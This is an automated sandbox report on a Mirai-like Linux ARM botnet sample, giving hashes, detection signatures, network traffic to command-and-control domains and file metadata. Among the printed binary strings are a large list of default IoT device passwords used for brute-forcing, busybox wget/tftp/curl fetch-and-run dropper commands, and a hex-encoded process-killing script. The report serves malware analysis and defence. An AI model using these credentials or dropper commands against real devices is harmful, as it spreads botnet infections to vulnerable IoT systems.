Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name:la.bot.arm7.elf
Analysis ID:1541937
MD5:16d9b8da877deb5492a6b32d5c7003d9
SHA1:d25eaef35a1e99bcb4878ef7bc4af98850b3cd76
SHA256:eee2c30e7279d78473966120b3bc15047439754a332f3f4862c3cdb6c9881187
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1541937
Start date and time:2024-10-25 10:42:10 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 44s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm7.elf
Detection:MAL
Classification:mal52.troj.linELF@0/0@5/0
  • VT rate limit hit for: la.bot.arm7.elf
Command:/tmp/la.bot.arm7.elf
PID:5432
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm7.elfReversingLabs: Detection: 34%
Source: la.bot.arm7.elfString: ash|login|wget|curl|tftp|ntpdate|ftp|mount
Source: la.bot.arm7.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp|mount/mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc//proc/self/exe/dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4p

Networking

barindex
Source: global trafficDNS traffic detected: malformed DNS query: nineteen.libre. [malformed]
Source: global trafficTCP traffic: 192.168.2.13:57088 -> 156.244.13.91:7193
Source: /tmp/la.bot.arm7.elf (PID: 5432)Socket: 127.0.0.1:1234Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 162.243.19.47
Source: unknownUDP traffic detected without corresponding DNS query: 63.231.92.27
Source: unknownUDP traffic detected without corresponding DNS query: 192.3.165.37
Source: unknownUDP traffic detected without corresponding DNS query: 130.61.69.123
Source: unknownUDP traffic detected without corresponding DNS query: 130.61.69.123
Source: unknownUDP traffic detected without corresponding DNS query: 63.231.92.27
Source: unknownUDP traffic detected without corresponding DNS query: 162.243.19.47
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: global trafficDNS traffic detected: DNS query: imaverygoodbadboy.libre
Source: global trafficDNS traffic detected: DNS query: nineteen.libre. [malformed]
Source: global trafficDNS traffic detected: DNS query: 75cents.libre
Source: la.bot.arm7.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm7.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/0@5/0
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/11/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/22/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/55/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/66/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/88/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/99/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/111/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/222/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/333/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/33333/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/777/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/888/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/11111/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 5432)File opened: /proc/999/mapsJump to behavior
Source: submitted sampleStderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Source: /tmp/la.bot.arm7.elf (PID: 5432)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm7.elf, 5432.1.00005654f837e000.00005654f84cd000.rw-.sdmp, la.bot.arm7.elf, 5434.1.00005654f837e000.00005654f84cd000.rw-.sdmp, la.bot.arm7.elf, 5452.1.00005654f837e000.00005654f84cd000.rw-.sdmpBinary or memory string: TV!/etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 5432.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmp, la.bot.arm7.elf, 5434.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmp, la.bot.arm7.elf, 5452.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
Source: la.bot.arm7.elf, 5432.1.00005654f837e000.00005654f84cd000.rw-.sdmp, la.bot.arm7.elf, 5434.1.00005654f837e000.00005654f84cd000.rw-.sdmp, la.bot.arm7.elf, 5452.1.00005654f837e000.00005654f84cd000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 5432.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmp, la.bot.arm7.elf, 5434.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmp, la.bot.arm7.elf, 5452.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm7.elf, 5434.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmp, la.bot.arm7.elf, 5452.1.00007ffcaab18000.00007ffcaab39000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541937 Sample: la.bot.arm7.elf Startdate: 25/10/2024 Architecture: LINUX Score: 52 16 nineteen.libre. [malformed] 2->16 18 75cents.libre 156.244.13.91, 57088, 7193 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 2->18 20 3 other IPs or domains 2->20 22 Multi AV Scanner detection for submitted file 2->22 8 la.bot.arm7.elf 2->8         started        signatures3 24 Sends malformed DNS queries 16->24 process4 process5 10 la.bot.arm7.elf 8->10         started        12 la.bot.arm7.elf 8->12         started        process6 14 la.bot.arm7.elf 10->14         started       
SourceDetectionScannerLabelLink
la.bot.arm7.elf34%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
75cents.libre
156.244.13.91
truefalse
    unknown
    daisy.ubuntu.com
    162.213.35.24
    truefalse
      unknown
      nineteen.libre. [malformed]
      unknown
      unknowntrue
        unknown
        imaverygoodbadboy.libre
        unknown
        unknownfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http:///wget.shla.bot.arm7.elffalse
            unknown
            http:///curl.shla.bot.arm7.elffalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              130.61.69.123
              unknownUnited States
              31898ORACLE-BMC-31898USfalse
              156.244.13.91
              75cents.libreSeychelles
              132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              130.61.69.123na.elfGet hashmaliciousUnknownBrowse
                na.elfGet hashmaliciousUnknownBrowse
                  na.elfGet hashmaliciousUnknownBrowse
                    na.elfGet hashmaliciousUnknownBrowse
                      na.elfGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Linux.Mirai.5075.8943.20322.elfGet hashmaliciousUnknownBrowse
                          3nRuuUdCDQ.elfGet hashmaliciousUnknownBrowse
                            156.244.13.91la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                  la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    daisy.ubuntu.comHUyUkUjJ4y.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    GSVzm51Pg5.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    4id267qj0M.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    3HOhJoCrj5.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    8DKuAcmAMT.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    yakuza.arm6.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    jade.arm6.elfGet hashmaliciousMiraiBrowse
                                    • 162.213.35.25
                                    jade.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 162.213.35.25
                                    yakuza.arm7.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    c0r0n4x.x86.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    75cents.librela.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 103.253.147.242
                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 103.253.147.242
                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                    • 156.244.13.91
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    POWERLINE-AS-APPOWERLINEDATACENTERHK8DKuAcmAMT.elfGet hashmaliciousUnknownBrowse
                                    • 154.216.35.218
                                    garm7.elfGet hashmaliciousMiraiBrowse
                                    • 156.251.7.191
                                    garm.elfGet hashmaliciousMiraiBrowse
                                    • 156.244.234.103
                                    garm7.elfGet hashmaliciousMiraiBrowse
                                    • 156.251.7.150
                                    nshppc.elfGet hashmaliciousMiraiBrowse
                                    • 156.251.7.154
                                    garm5.elfGet hashmaliciousMiraiBrowse
                                    • 156.242.206.35
                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                    • 156.244.19.135
                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 156.250.251.29
                                    byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 154.202.138.140
                                    rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                    • 154.215.72.110
                                    ORACLE-BMC-31898USNew_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                    • 158.101.44.242
                                    Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 140.238.246.224
                                    la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 130.35.12.1
                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 168.138.244.186
                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                    • 130.61.64.122
                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 140.238.158.19
                                    g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                    • 193.122.6.168
                                    Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                    • 193.122.6.168
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                    Entropy (8bit):6.050381047617765
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:la.bot.arm7.elf
                                    File size:95'804 bytes
                                    MD5:16d9b8da877deb5492a6b32d5c7003d9
                                    SHA1:d25eaef35a1e99bcb4878ef7bc4af98850b3cd76
                                    SHA256:eee2c30e7279d78473966120b3bc15047439754a332f3f4862c3cdb6c9881187
                                    SHA512:9532169fefcbe1e523d28967cf72f1aa7757bc5f899e228ec5ffc202f8817e424240cf4f1d7d31c7c18918f3e06c7aeccf183c5a834e3208dabb6be740ca096c
                                    SSDEEP:1536:P4nMMaNbX41vgOtJhktPfk2Bzodfs2iUroYTHHQVHmegWlFoi9mWqtBlnzsT:USX41vgOtJhIk2zoO2iUroYTHHQVHtSN
                                    TLSH:1293F74AF8829E16C5D815BEFE0F528D332367A8E3EE7203DD146B2537CA55B0A7B441
                                    File Content Preview:.ELF..............(.........4....s......4. ...(........p8m..8...8...................................Pn..Pn...............p...p...p..p....s...............p...p...p..................Q.td..................................-...L..................@-.,@...0....S

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, little endian
                                    Version:1 (current)
                                    Machine:ARM
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:UNIX - System V
                                    ABI Version:0
                                    Entry Point Address:0x8194
                                    Flags:0x4000002
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:5
                                    Section Header Offset:95204
                                    Section Header Size:40
                                    Number of Section Headers:15
                                    Header String Table Index:14
                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                    NULL0x00x00x00x00x0000
                                    .initPROGBITS0x80d40xd40x100x00x6AX004
                                    .textPROGBITS0x80f00xf00x14ce00x00x6AX0016
                                    .finiPROGBITS0x1cdd00x14dd00x100x00x6AX004
                                    .rodataPROGBITS0x1cde00x14de00x1f400x00x2A004
                                    .ARM.extabPROGBITS0x1ed200x16d200x180x00x2A004
                                    .ARM.exidxARM_EXIDX0x1ed380x16d380x1180x00x82AL204
                                    .eh_framePROGBITS0x270000x170000x40x00x3WA004
                                    .tbssNOBITS0x270040x170040x80x00x403WAT004
                                    .init_arrayINIT_ARRAY0x270040x170040x40x00x3WA004
                                    .fini_arrayFINI_ARRAY0x270080x170080x40x00x3WA004
                                    .gotPROGBITS0x270100x170100xa80x40x3WA004
                                    .dataPROGBITS0x270b80x170b80x2b80x00x3WA004
                                    .bssNOBITS0x273700x173700x70340x00x3WA004
                                    .shstrtabSTRTAB0x00x173700x730x00x0001
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    EXIDX0x16d380x1ed380x1ed380x1180x1184.45840x4R 0x4.ARM.exidx
                                    LOAD0x00x80000x80000x16e500x16e506.08040x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                    LOAD0x170000x270000x270000x3700x73a44.39860x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                    TLS0x170040x270040x270040x00x80.00000x4R 0x4.tbss
                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 25, 2024 10:43:19.366174936 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:43:19.371665001 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:43:19.371768951 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:43:19.372347116 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:43:19.377780914 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:43:34.388139963 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:43:34.393943071 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:44:22.286731005 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:44:22.286885977 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:44:22.286978960 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:44:22.287020922 CEST570887193192.168.2.13156.244.13.91
                                    Oct 25, 2024 10:44:22.287240028 CEST719357088156.244.13.91192.168.2.13
                                    Oct 25, 2024 10:44:22.287300110 CEST570887193192.168.2.13156.244.13.91
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 25, 2024 10:42:58.519468069 CEST572385353192.168.2.13162.243.19.47
                                    Oct 25, 2024 10:43:00.568053007 CEST3325653192.168.2.138.8.8.8
                                    Oct 25, 2024 10:43:00.568120003 CEST4393253192.168.2.138.8.8.8
                                    Oct 25, 2024 10:43:00.580452919 CEST53332568.8.8.8192.168.2.13
                                    Oct 25, 2024 10:43:00.581456900 CEST53439328.8.8.8192.168.2.13
                                    Oct 25, 2024 10:43:03.526305914 CEST4433753192.168.2.1363.231.92.27
                                    Oct 25, 2024 10:43:08.532721996 CEST5953853192.168.2.13192.3.165.37
                                    Oct 25, 2024 10:43:08.633632898 CEST5359538192.3.165.37192.168.2.13
                                    Oct 25, 2024 10:43:08.634774923 CEST444785353192.168.2.13130.61.69.123
                                    Oct 25, 2024 10:43:13.641473055 CEST516825353192.168.2.13130.61.69.123
                                    Oct 25, 2024 10:43:18.648196936 CEST608385353192.168.2.1363.231.92.27
                                    Oct 25, 2024 10:43:19.267960072 CEST53536083863.231.92.27192.168.2.13
                                    Oct 25, 2024 10:43:19.269665956 CEST5393953192.168.2.13162.243.19.47
                                    Oct 25, 2024 10:43:19.364258051 CEST5353939162.243.19.47192.168.2.13
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 25, 2024 10:43:00.568053007 CEST192.168.2.138.8.8.80x87d7Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                    Oct 25, 2024 10:43:00.568120003 CEST192.168.2.138.8.8.80x112Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                    Oct 25, 2024 10:43:03.526305914 CEST192.168.2.1363.231.92.270xfde0Standard query (0)imaverygoodbadboy.libreA (IP address)IN (0x0001)false
                                    Oct 25, 2024 10:43:08.532721996 CEST192.168.2.13192.3.165.370x8306Standard query (0)nineteen.libre. [malformed]256284false
                                    Oct 25, 2024 10:43:19.269665956 CEST192.168.2.13162.243.19.470xc83cStandard query (0)75cents.libreA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 25, 2024 10:43:00.580452919 CEST8.8.8.8192.168.2.130x87d7No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                    Oct 25, 2024 10:43:00.580452919 CEST8.8.8.8192.168.2.130x87d7No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                    Oct 25, 2024 10:43:19.364258051 CEST162.243.19.47192.168.2.130xc83cNo error (0)75cents.libre156.244.13.91A (IP address)IN (0x0001)false
                                    Oct 25, 2024 10:43:19.364258051 CEST162.243.19.47192.168.2.130xc83cNo error (0)75cents.libre103.253.147.242A (IP address)IN (0x0001)false

                                    System Behavior

                                    Start time (UTC):08:42:57
                                    Start date (UTC):25/10/2024
                                    Path:/tmp/la.bot.arm7.elf
                                    Arguments:/tmp/la.bot.arm7.elf
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):08:42:57
                                    Start date (UTC):25/10/2024
                                    Path:/tmp/la.bot.arm7.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):08:42:57
                                    Start date (UTC):25/10/2024
                                    Path:/tmp/la.bot.arm7.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):08:42:57
                                    Start date (UTC):25/10/2024
                                    Path:/tmp/la.bot.arm7.elf
                                    Arguments:-
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1